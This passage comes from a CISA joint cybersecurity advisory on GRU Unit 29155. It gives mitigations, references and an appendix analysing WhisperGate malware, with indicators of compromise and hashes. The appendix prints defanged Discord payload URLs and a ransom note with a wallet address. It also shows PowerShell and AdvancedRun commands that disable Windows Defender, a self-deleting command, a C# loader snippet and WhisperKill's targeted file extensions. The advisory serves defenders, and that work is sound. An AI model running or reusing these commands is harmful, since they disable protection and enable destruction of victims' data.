and PowerShell activity. Update to the latest version and uninstall all\r\nearlier PowerShell versions (CISA CPG 2.N).\r\nImplement a continuous system monitoring program, such as security information and event management\r\n(SIEM) or endpoint detection and response (EDR) solutions, to comprehensively log and review all authorized\r\nexternal access connections. This logging will better ensure the prompt detection of misuse or abnormal activity\r\n(CISA CPG 2.T).\r\nMonitor for unauthorized access attempts and programming anomalies through comprehensive logging that is\r\nsecured from modification, such as limiting permissions and adding redundant remote logging (CISA CPG 2.U).\r\nSecurity appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands,\r\nand suspicious PowerShell commands for timely identification and remediation.\r\nIdentify any use of outdated or weak encryption, update these to sufficiently strong algorithms, and consider the\r\nimplications of post-quantum cryptography (CISA CPG 2.K). Use properly configured and up-to-date Secure Socket\r\nLayer (SSL)/Transport Layer Security (TLS) to protect data in transit.\r\nSecurity Controls\r\nIn addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's\r\nsecurity program against the threat behaviors mapped to the MITRE ATT\u0026CK for Enterprise framework in this advisory.\r\nThe authoring agencies recommend testing your existing security controls inventory to assess how they perform against the\r\nATT\u0026CK techniques described in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see Table 3 to Table 14).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. Tune your security program, including people, processes, and technologies, based on the data generated by this\r\nprocess.\r\nThe authoring agencies recommend continually testing your security program, at scale, in a production environment to\r\nensure optimal performance against the MITRE ATT\u0026CK techniques identified in this advisory.\r\nResources\r\nMITRE: WhisperGate\r\nCISA AA22-057A: Destructive Malware Targeting Organizations in Ukraine\r\nDOJ Press Release: Russian National Charged for Conspiring with Russian Military Intelligence to Destroy\r\nUkrainian Government Computer Systems and Data\r\nFBI: Cyber Crime\r\nCISA: Russia Cyber Threat Overview and Advisories\r\nMITRE: Group G1003 - Ember Bear\r\nMITRE: Impacket\r\nNIST NVD: CVE-2020-1472\r\nNIST NVD: CVE-2021-26084\r\nNIST NVD: CVE-2021-3156\r\nNIST NVD: CVE-2021-4034\r\nNIST NVD: CVE-2022-27666\r\nNIST NVD: CVE-2021-33044\r\nNIST NVD: CVE-2021-33045\r\nNIST NVD: CVE-2022-26134\r\nNIST NVD: CVE-2022-26138\r\nNIST NVD: CVE-2022-3236\r\nMITRE: BloodHound\r\nMITRE: Rclone\r\nMITRE: P.A.S. Webshell\r\nCISA: Known Exploited Vulnerabilities Catalog\r\nCISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 10 of 20\n\nCISA, NIST: Defending Against Supply Chain Attacks\r\nCISA, NSA: IAM Recommended Best Practices Guide for Administrators\r\nReferences\r\n1. Microsoft Threat Intelligence Center: Destructive Malware Targeting Ukrainian Organizations\r\n2. Microsoft Threat Intelligence Center: Cadet Blizzard Emerges as a Novel and Distinct Russian Threat Actor\r\n3. CrowdStrike: EMBER BEAR Threat Actor Profile\r\n4. Mandiant Threat Intelligence: Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation\r\n5. SentinelOne: Threat Actor UAC-0056 Targeting Ukraine with Fake Translation Software\r\n6. Introduction to Acunetix\r\n7. GitHub: OWASP Amass\r\n8. Kali Linux Tutorials: Droopescan\r\n9. GitHub: OWASP JoomScan\r\n10. Kali.org: MASSCAN\r\n11. DigitalOcean: How To Use Netcat to Establish and Test TCP and UDP Connections\r\n12. Shodan: What is Shodan?\r\n13. VirusTotal: How it Works\r\n14. GitHub: Through the Wire\r\n15. Confluence Security Advisory: Confluence Server and Data Center - CVE-2022-26134\r\n16. Microsoft: Security Bulletin MS17-010\r\n17. Avast: What is EternalBlue and Why is the MS17-010 Exploit Still Relevant?\r\n18. Palo Alto Networks Unit 42: Threat Brief - Ongoing Russia and Ukraine Cyber Activity\r\n19. CERT-UA#3799 Report\r\n20. Bellingcat: Attack on Ukrainian Government Websites Linked to GRU Hackers\r\n21. Trend Micro: Cyberattacks are Prominent in the Russia-Ukraine Conflict\r\nContact Information\r\nTo report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local\r\nFBI field office or CISA’s 24/7 Operations Center at contact@mail.cisa.dhs.gov or (888) 282-0870. When available,\r\nplease include the following information regarding the incident: date, time, and location of the incident; type of activity;\r\nnumber of people affected; type of equipment used for the activity; the name of the submitting company or organization; and\r\na designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact\r\nCybersecurity_Requests@nsa.gov .\r\nDisclaimer\r\nThe information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do\r\nnot endorse any commercial entity, product, company, or service, including any entities, products, or services linked within\r\nthis document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark,\r\nmanufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the\r\nauthoring agencies.\r\nVersion History\r\nSeptember 5, 2024: Initial version.\r\nAppendix A: WhisperGate Malware Analysis\r\nOverview\r\nThis technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim\r\nand analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password\r\ncompromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin\r\nAmerica and Central Asia.\r\nUnit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files, stage1.exe and stage2.exe .\r\nWhisperGate has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files\r\nbased on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files,\r\nincluding what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat\r\nactors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection\r\nchain by directly sharing files through its platform. In the case of stage2.exe , the binary communicated with Discord to\r\nobtain Tbopbh.jpg —the malicious payload that is in-memory loaded and performs the destructive capabilities.[18 ]\r\nCategorization\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 11 of 20\n\nThe Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as\r\nClusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based\r\non analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following\r\nsections include notable details found within each cluster.\r\nCluster 1\r\nCluster 1 contained the following files:\r\nhxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg (a resource,\r\ne.g., payload, for stage2.exe)[18 ]\r\nsaint.exe (a downloader, SaintBot , as detailed by CERT-UA)[19 ]\r\nputtyjejfrwu.exe [19 ]\r\nCluster 2\r\nCluster 2 contained:\r\nhxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip\r\n(means for sending malware in over 35 different zip files via Discord links)[20 ]\r\nSeveral Microsoft Word documents with macros that download test01.exe from 3237.site . Once executed,\r\ntest01.exe downloads load2022.exe from smm2021.net .\r\nCluster 3\r\nCluster 3 contained:\r\nhxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe (Note: Unit\r\n29155 cyber actors’ use of Client.exe was confirmed as linked to the activity, but the file was not obtained for\r\nanalysis and functionality cannot be confirmed.)\r\nasd.exe (likely a development version of stage1.exe )\r\nBehavioral Analysis\r\nTwo Windows Portable Executable (PE) files ( stage1.exe and stage2.exe ) were obtained from the Ukrainian victim for\r\nanalysis. One PE file ( asd.exe ) was obtained from a U.S. victim.\r\nstage1.exe\r\nstage1.exe was obtained from the C:\\ path of the Ukrainian victim’s Windows machine. stage1.exe executes when the\r\ninfected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting\r\nnormally. Table 15 lists the hashes and properties attributed to stage1.exe .\r\nTable 15: stage1.exe Properties\r\nMD5 5d5c99a08a7d927346ca2dafa7973fc1\r\nSHA-256 a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92\r\nCompiler MinGW(GCC: (GNU) 6.3.0)[-]\r\nLinker GNU linker Id (GNU Binutils)(2.28)[GUI32]\r\nTimeDateStamp 2022-01-10 05:37:18\r\nExecution\r\nMessage\r\nYour hard drive has been corrupted. In case you want to recover all hard drives of your organization, You\r\nshould pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via\r\ntox ID\r\n8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65\r\nwith your organization name. We will contact you to give further instructions.\r\nTable 16: asd.exe Properties\r\nMD5 eac0ae655d344c25ff467a929790885c\r\nSHA-256 b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b\r\nCompiler MinGW(GCC: (GNU) 6.3.0)[-]\r\nLinker GNU linker Id (GNU Binutils)(2.28)[Console32,console]\r\nTimeDateStamp 1969-12-31 19:00:00\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 12 of 20\n\nasd.exe is likely a development version of stage1.exe . While the behavior of asd.exe is similar to stage1.exe , the\r\nmessages displayed were different.\r\nstage2.exe\r\nstage2.exe was obtained from the C:\\ path of the Ukrainian victim’s Windows machine. Table 17 lists the hashes and\r\nproperties attributed to stage2.exe .\r\nTable 17: stage2.exe Properties\r\nMD5 764f691b2168e8b3b6f9fb6582e2f819\r\nSHA-256 aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a\r\nLibrary .NET(v4.0.30319)[-]\r\nLinker Microsoft Linker(6.0)(GUI32,signed)\r\nTimeDateStamp 2022-01-10 09:39:54\r\nTable 18 lists the following chronological observations when stage2.exe executes.\r\nTable 18: stage2.exe Behavioral Analysis Observations\r\nEvent Victim Observation\r\nPowerShell command executed\r\ntwice\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" –enc\r\nUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==\r\nBase64 UTF-16LE string\r\ndecoded\r\nStart-Sleep -s 10\r\nHTTP GET request sent to\r\nDiscord URL to download\r\nTbopbh.jpg\r\nhxxp://cdn.discordapp.com/attachments/\r\n928503440139771947/930108637681184768/Tbopbh[.]jpg\r\nNmddfrqqrbyjeygggda.vbs\r\ncreated and executed within\r\nthe %TEMP% directory\r\nThe Visual Basic Script (VBS) file contained the following command:\r\nCreateObject(“WScript.Shell”).Run “powershell Set-MpPreference -\r\nExclusionPath ‘C:\\’”, 0, False\r\nAdvancedRun.exe created and\r\nexecuted twice\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\AdvancedRun.exe” /EXEFilename\r\n“C:\\Windows\\System32\\sc.exe” /WindowState 0 /CommandLine “stop WinDefend”\r\n/StartDirectory “” /RunAs 8 /Run\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\AdvancedRun.exe” /EXEFilename\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” /WindowState 0\r\n/CommandLine “rmdir ‘C:\\ProgramData\\Microsoft\\Windows Defender’ –Recurse”\r\n/StartDirectory “” /RunAs 8 /Run\r\nInstallUtil.exe created and\r\nexecuted; files corrupted\r\nfollowing execution\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\InstallUtil.exe\r\nStatic Analysis\r\nStatic analysis was further conducted on two files ( stage2.exe , Tbopbh.jpg ) to uncover additional malware functionality\r\nand attributes.\r\nstage2.exe\r\nStatic analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the\r\nMD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in\r\nTable 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.\r\nTable 19: stage2.exe Variant Properties\r\nMD5 14c8482f302b5e81e3fa1b18a509289d\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 13 of 20\n\nSHA-256 dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78\r\nLibrary .NET(v4.0.30319)[-]\r\nLinker Microsoft Linker(6.0)(GUI32,signed)\r\nTimeDateStamp 2022-01-10 09:39:54\r\nThis variant of stage2.exe contained multiple layers of execution:\r\nstage2.exe contained a WebClient object that was initialized with Discord URL\r\nhxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg to obtain the\r\npayload Tbopbh.jpg .\r\nstage2.exe contained logic to reverse file bytes of a file using the Array’s Reverse method.\r\nstage2.exe contained logic to load an Assembly object into a Stream object.\r\nstage2.exe used the reflection library to call method Ylfwdwgmpilzyaph from the loaded Assembly object.\r\nstage2.exe contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption\r\nclass which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to\r\ndecrypt. Additionally, the XOR functionality occurred using the initialized byte “Array” shown below. The\r\nencryption class resembled RC4; it was used every 32 bytes. The base64 string came from a class that contained\r\nEazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to\r\nanalyze:\r\nbyte[] array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220};\r\nstage2.exe contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the\r\nfull strings would have been obfuscated and further segmented when viewed statically. The following is an example\r\nof a built string:\r\nUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==\r\nWhen the above string was base64 decoded, the system displayed the following PowerShell command: Start-Sleep\r\n-s 10\r\nstage2.exe served as the downloader and driver logic for the malware payload, Tbopbh.jpg .\r\nTbopbh.jpg (payload for stage2.exe variant)\r\nAn account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:\r\nMD5: b3370eb3c5ef6c536195b3bea0120929\r\nSHA-256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6\r\nWhen viewing payload Tbopbh.jpg using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated\r\nthe payload was a reversed PE. Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in\r\nTable 20 below.\r\nTable 20: Tbopbh.jpg Properties\r\nMD5 e61518ae9454a563b8f842286bbdb87b\r\nSHA-256 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d\r\nProtector Eazfuscator(-)[-]\r\nLibrary .NET(v4.0.30319)[-]\r\nLinker Microsoft Linker(6.0)[DLL32]\r\nTimeDateStamp 2022-01-10 09:39:31\r\nThe original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll ; its\r\nattributes are listed in Table 21:\r\nTable 21: Frkmlkdkdubkznbkmcf.dll Attributes\r\nResources Classes Methods \r\n\\u2005 \\u2005 \\u2009 \\u2008 \\u2001 \\u2007 \\u2009 \\u200b\r\n\\u200a \\u2005\r\nNote: This format annotates action taken by EazFuscator to\r\nobfuscate items, making it difficult for malware analysts to\r\nreview.\r\nMain - ClassLibrary1 \\u0002\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 14 of 20\n\nResources Classes Methods\n7c8cb5598e724d34384cce7402b11f0e\npc1eOx2WJVV1579235895\n–\nYlfwdwgmpilzyaph\n78c855a088924e92a7f60d661c3d1845\nstage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource\n78c855a088924e92a7f60d661c3d1845 . The reflection library was used to execute method Ylfwdwgmpilzyaph , as shown in\nthe following C# code block:\nusing System.Reflection;\nstring path = \"Frkmlkdkdubkznbkmcf.dll\";\nstring fqpn = Path.GetFullPath(path);\nAssembly assembly = Assembly.LoadFile(fqpn);\nType type = assembly.GetType(\"ClassLibrary1.Main\");\ntype.InvokeMember(\"Ylfwdwgmpilzyaph\", BindingFlags.InvokeMethod, null, null, null);\nThe following application configuration accompanied the above code block to allow loading from remote sources:\n?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\nUpon invoking the method Ylfwdwgmpilzyaph , Nmddfrqqrbyjeygggda.vbs wrote to the Windows %TEMP% directory and\nhas the following attributes, as listed in Table 22 below.\nTable 22: Nmddfrqqrbyjeygggda.vbs Attributes\nMD5 6eed4ee0cc57126e9a096ab9905f471c\nSHA-256 db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f\nVBS Code CreateObject(\"WScript.Shell\").Run \"powershell Set-MpPreference -ExclusionPath 'C:\\'\", 0, False\nThe VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell\ncommand to exclude the C:\\ drive from Windows Defender's security checks. Malware analysts decoded and decrypted one\nof the resources from Frkmlkdkdubkznbkmcf.dll ( 78c855a088924e92a7f60d661c3d1845 ). Further analysis of\nFrkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes:\nMD5: 5a537673c34933fc854fbfb65477a686\nSHA-256: 35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a\nThis decrypted DLL file contained two resources, AdvancedRun and Waqybg .\nAdvancedRun (GZIP)\nMD5: de85ca91e1e8100a619de1c25112f1a5\nSHA-256: 489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166\nWaqybg (GZIP)\nReversed byte order:\nMD5: 9b1191f1ceddf312b0d609cd929c6631\nSHA-256: 0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3\nOriginal byte order:\nMD5: 29d83f29c0b0a0b7499e71e7d5cb713f\nSHA-256: fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2\nTable 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files.\nTable 23: AdvancedRun (decompressed)\nType Win32 EXE\nCompany NirSoft\nTimeStamp 2020:08:03 09:41:38-04:00\nOriginal File Name AdvancedRun.exe\nMD5 17fc12902f4769af3a9271eb4e2dacce\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\nPage 15 of 20\n\nSHA-256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b\r\nTable 24: Waqybg (reversed; decompressed)\r\nType Win32 EXE\r\nTimeStamp 2022:01:10 03:14:38-05:00\r\nMD5 3907c7fbd4148395284d8e6e3c1dba5d\r\nSHA-256 34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907\r\nCompiler MinGW(GCC: (GNU) 6.3.0)[-]\r\nLinker GNU linker Id (GNU Binutils)(2.28)[Console32,console]\r\nThe reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily\r\nand delete itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 \u003e Nul \u0026 Del /f /q “%s” . Waqybg is known as\r\nWhisperKill—a malware downloaded by WhisperGate that destroys files with specific extensions.[19 ],[21 ]\r\nThe following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the “wcscmp” C\r\nfunction logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc\r\nvalues per targeted file.\r\nTable 25: File Extensions Targeted by WhisperKill\r\nu\".3DM\" u\".3DS\" u\".602\" u\".ACCDB\" u\".ARC\" u\".ASC\"\r\nu\".ASM\" u\".ASP\" u\".ASPX\" u\".BACKUP\" u\".BAK\" u\".BAT\"\r\nu\".BMP\" u\".BRD\" u\".BZ2\" u\".CGM\" u\".CLASS\" u\".CMD\"\r\nu\".CONFIG\" u\".CPP\" u\".CRT\" u\".CSR\" u\".CSV\" u\".DBF\"\r\nu\".DCH\" u\".DER\" u\".DIF\" u\".DIP\" u\".DJVU.SH\" u\".DOC\"\r\nu\".DOCB\" u\".DOCM\" u\".DOCM\" u\".DOCX\" u\".DOT\" u\".DOTM\"\r\nu\".DOTX\" u\".DWG\" u\".EDB\" u\".EML\" u\".FRM\" u\".GIF\"\r\nu\".HDD\" u\".HTM\" u\".HWP\" u\".IBD\" u\".INC\" u\".INI\"\r\nu\".ISO\" u\".JAR\" u\".JAVA\" u\".JPEG\" u\".JPG\" u\".JSP\"\r\nu\".KDBX\" u\".KEY\" u\".LAY\" u\".LAY6\" u\".LDF\" u\".LOG\"\r\nu\".MAX\" u\".MDB\" u\".MDF\" u\".MML\" u\".MSG\" u\".MYD\"\r\nu\".MYI\" u\".NEF\" u\".NVRAM\" u\".ODB\" u\".ODG\" u\".ODP\"\r\nu\".ODS\" u\".ODT\" u\".OGG\" u\".ONETOC2\" u\".OST\" u\".OTG\"\r\nu\".OTP\" u\".OTS\" u\".OTT\" u\".P12\" u\".PAQ\" u\".PAS\"\r\nu\".PDF\" u\".PEM\" u\".PFX\" u\".PHP\" u\".PHP3\" u\".PHP4\"\r\nu\".PHP5\" u\".PHP6\" u\".PHP7\" u\".PHPS\" u\".PHTML\" u\".PNG\"\r\nu\".POT\" u\".POTM\" u\".POTX\" u\".PPAM\" u\".PPK\" u\".PPS\"\r\nu\".PPSM\" u\".PPSX\" u\".PPT\" u\".PPTM\" u\".PPTM\" u\".PPTX\"\r\nu\".PS1\" u\".PSD\" u\".PST\" u\".RAR\" u\".RAW\" u\".RTF\"\r\nu\".SAV\" u\".SCH\" u\".SHTML\" u\".SLDM\" u\".SLDX\" u\".SLK\"\r\nu\".SLN\" u\".SNT\" u\".SQ3\" u\".SQL\" u\".SQLITE3\" u\".SQLITEDB\"\r\nu\".STC\" u\".STD\" u\".STI\" u\".STW\" u\".SUO\" u\".SVG\"\r\nu\".SXC\" u\".SXD\" u\".SXI\" u\".SXM\" u\".SXW\" u\".TAR\"\r\nu\".TBK\" u\".TGZ\" u\".TIF\" u\".TIFF\" u\".TXT\" u\".UOP\"\r\nu\".UOT\" u\".VBS\" u\".VCD\" u\".VDI\" u\".VHD\" u\".VMDK\"\r\nu\".VMEM\" u\".VMSD\" u\".VMSN\" u\".VMSS\" u\".VMTM\" u\".VMTX\"\r\nu\".VMX\" u\".VMXF\" u\".VSD\" u\".VSDX\" u\".VSWP\" u\".WAR\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 16 of 20\n\nu\".WB2\" u\".WK1\" u\".WKS\" u\".XHTML\" u\".XLC\" u\".XLM\"\r\nu\".XLS\" u\".XLSB\" u\".XLSM\" u\".XLSM\" u\".XLSX\" u\".XLT\"\r\nu\".XLTM\" u\".XLTX\" u\".XLW\" u\".YML\" u\".ZIP\"  \r\nMalware Related to Tbopbh.jpg\r\nstage2.exe and its respective payload, Tbopbh.jpg , served as a template for other malware within Discord Cluster 1.\r\nWhile most of these other malware files have not been observed in open source reporting, malware analysts assess them as\r\npayloads that follow the unravelling process listed in Figure 1 below.\r\nFigure 1: stage2.exe Execution Process Template\r\nTable 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become\r\nDLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll .\r\nNote: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order.\r\nAnalysts reversed the file byte order for each file into their proper portable executable format, e.g., “Functional” format. The\r\nhashes in Table 26 represent both byte orders.\r\nTable 26: Files Located in Discord Cluster 1\r\nFilename MD5 (Reversed) MD5 (Functional)\r\nAfgyyppsysmtddhvhhaw.dll d034fe4c71b16b6d331886c24fef2751 4074798a621232dc448b65db7b1fdd66\r\nAvbbwys.dll 422437f326b8dbe30cc5f103bde31f26 7f84263fd24f783ff72d5ae91011b558\r\nAzkebvoyswvjnrpmn.dll 562c337b8caca330da2ea6ae07ee5db6 f73d203bdf924658fd6edf3444c93a50\r\nBudoejokuqbge.dll 58e879213d81333b628434ba4aeb2751 08dfebc04eb61c9a6d87b6524c1c0f2e\r\nBwqdffttejlkeqe.dll 1c85c0d044ac837e8939564afac1eb32 8633bd2bbbb5da22c3f8751150186c42\r\nBxqbsyxfkjzmhdtfceoak.dll 7234da8ceafbe6586469f18c03cc1832 5f4df6dd8e644d59eaf182e500b5e7bf\r\nClsrncpbaucrabuobcpale.dll 618d62dd95fd9aeb855fe2ef1403dce5 955e4c198ee58e40fe92cb74ceefdf00\r\nCpdvzvzyghy.dll d40195a444526eafb0db56d95bf8655d a905d620717f75751aa94ceb88995dbc\r\nCtiktdfyauejxfak.dll d06761b2cff86035a4838110ed6ab622 2ca6bcf16ee4293a771a1cf7b7b9ee49\r\nCzxhayyankwsp.dll 59da31da4db1aa5f9a5c7c0c151422c8 de1bf141976776becd376a0dac400df6\r\nDjpajq.dll de1f9d1f0336ddcff832ad3900acd2f1 974e7c0b3660fbf18f29eac059f85ac0\r\nDmdtflkcgebf.dll 394e056cb6cb732dfd5e0d45d3dae938 4d8343c40be53d6521244fe74393d937\r\nEjcpaujkmvjndgqznimmkgd.dll b7c1a8d39f46eaf52be90e24565dd6b0 7a70d5fbbafe3454b76e3ad2f009618f\r\nEncuutwvdqbxlxh.dll 2b39eab325906b0a3ab7e584c3d67349 df4f856f783d23fb01af1e0e64bc0e20\r\nEsalfjyraquwfxcgufwzip.dll 80f0ee332a452172533ad8863bb3bc63 f4f4e55a00d2f3a433c9e5624285ac1c\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 17 of 20\n\nFilename MD5 (Reversed) MD5 (Functional)\r\nFdgofjdvmmllgsxunb.dll 9345425cf07b4c39a80cd8540e08bfde eef2363744345741e09fe5380eeb4df3\r\nFkhzvcuucaprsibp.dll aecb57e20d2c0b0d9fece2cbcbcc3459 4bce4831b1dd71f19c55b3e3b5e99856\r\nFkthhyexkr.dll 58dc7c9577ff90a046359ca255c0c9f4 19cb20c4e7dbfe15c1aa284752d0fecb\r\nFqattuyxknkhv.dll 5c9e2195d10375b746b6717fdb47b5b9 2b5f159f022109a8de1bc5dd9e3138a0\r\nFqyubbzbubsge.dll afbb9459d4a0f60d7ffb3b3532d11bc2 8d3d4d702ba6b4be2766a41bfe5ff76e\r\nFrkmlkdkdubkznbkmcf.dll b3370eb3c5ef6c536195b3bea0120929 e61518ae9454a563b8f842286bbdb87b\r\nGsiook.dll a1b509254a0a1daa7e00d279ec974461 0e03103e8110785156105946e48ea9e0\r\nGutjuhi.dll 791a81f31a8e7090a7d5417451e09efa fba76f4eb2e7a2eb17193bebe290a198\r\nHisvswmeswmnqbvzpoxzx.dll e1a15bc13157134f542cd9c55c742460 c9d1677f4f89b95b41591b23a1dc1a63\r\nHsoahb.dll cd62d4a178705b2b90a8babd8613df93 032f5642d4fb2fdd74e6f20a13c57746\r\nIcyjkszdzgoxdfuwptkwxo.dll f34f60375bebad861a35b7c4bb0fa1c8 a66b3b22a3619f739b197d0d443b700c\r\nJdfzavlqr.dll 7fe7f33d9b5dbdf3d032d2a10e39f283 8cfef66b390f08bdbfd940922cf51650\r\nJrdggfjvve.dll b32e14a9b7de6c92cd16758fa6e23346 1220b580cef1bf22351e271773945d20\r\nJteieurqgvpgnhw.dll b85538f665fdb6c8d9a74f2df7369832 ffa68749aa3fc6495e2c49b01d964339\r\nKbuqtmznmodjzvxvwxcvho.dll 869742fb9db71fdb66f00528fe2966ec 5b884f15dc9b072d7bbad9ec2b249f38\r\nKdmvyizz.dll 2128361d8aaae1225d50c9add32006a1 9152c9de57b5647ee4ab3dff551dc8dd\r\nKfxghcmg.dll 56e0446a6d7175a0d09110bc483ddbed fc418fdda06ce5982153766dcefb71d9\r\nKrewcizfplntbwcqawfhtfpd.dll 6a4fca88ee36fecc5113e188cc39d25c 5c3b0040e2dece6e17093ae607b79044\r\nLsurhpmpyewhv.dll 143594597130e301499e5940a5fb798a 911c7e82f32f78577dcd725a7adb114d\r\nMbkzrkfasxgxtzhgpgsehip.dll 993f01861aff306df44e6475f7886f37 e4634ef9bfe7b598b857ad997445b239\r\nMhnovdgzzidqx.dll 64b9feeccf6c183b9f7138f8fc53acbb 7e0c42d33921a89724424f17c97037bd\r\nMlfampnfnmjvjnahkrawwqd.dll ddec2d79f460a881849037336ba8968f d973210977957209f255b58eb1715b12\r\nMppveiyannobrcdlkd.dll 9606b4720a0e73ef1f00505a11aab2f7 0adc2530cf348c0a3d53a680291a3d67\r\nMzhyeemgqbmamubqn.dll f772f5c65d65412f61ef5f2660e33ceb f8ffd1eab6223e31b15d0fd6c3c0472e\r\nNbbudwt.dll 875f9200b49db08c33962b0a6bd05ab9 2e035360971a817b854d7d5a2b008717\r\nNhqcfzagulwaw.dll fa97dbe84ce7717b754795fa89f13dce 601c12596dfea84c2113ae5ee59a52ec\r\nNlzhpvuzzoycqnnpl.dll d8c04ecd646a1f8537a59f63518ef3c6 47f4534da421daf8089cf34d53f6bb6e\r\nNoubvdigjlwsnqiylzgikkk.dll 3bcff990faacbebb8fb470dfe03e2543 683546b9171a1ea284a96d1b45d1d823\r\nNvxwbzciqarteyuz.dll c265188fdadddb648629e8060601dca7 af85885a74cfe099676af542dcdc5741\r\nNykfvwmchighqwcguabvgq.dll 8a2ba7f9cb6f65edf65dbe579907551e 673586594242d99ab02118595e457297\r\nOfgdwttnmqibnmpqx.dll 9657c2ef6ed5229740b125df9ca6c915 0dc5ac12f7690db15c99eaabc11b129c\r\nOhtvepefcjnchrrasokn.dll a5494ffd9efb7c3df59c527076a05e62 e2cc52273d56ed66c800a726760c1ed0\r\nOlkscszculdbzvco.dll 85afdef18d65b0518d709a5a324ea57a 77675a24040f10c85112d9a219d5f1c7\r\nOnkwzkpfuqazvali.dll da4d81f9ef3b25ea09f34481d923dd9d cc4a9db6f250114e26d8d9ba6ab46bc9\r\nOpaqwrazeyyilbbjlkf.dll 0e6374042b33d78329149a6189a7cb46 1934e2ebc64d41e37ef53ea0c075e974\r\nOwxtabfdqhkaahhwsgkatuu.dll d33f608f561096be24cba91797e0da2f 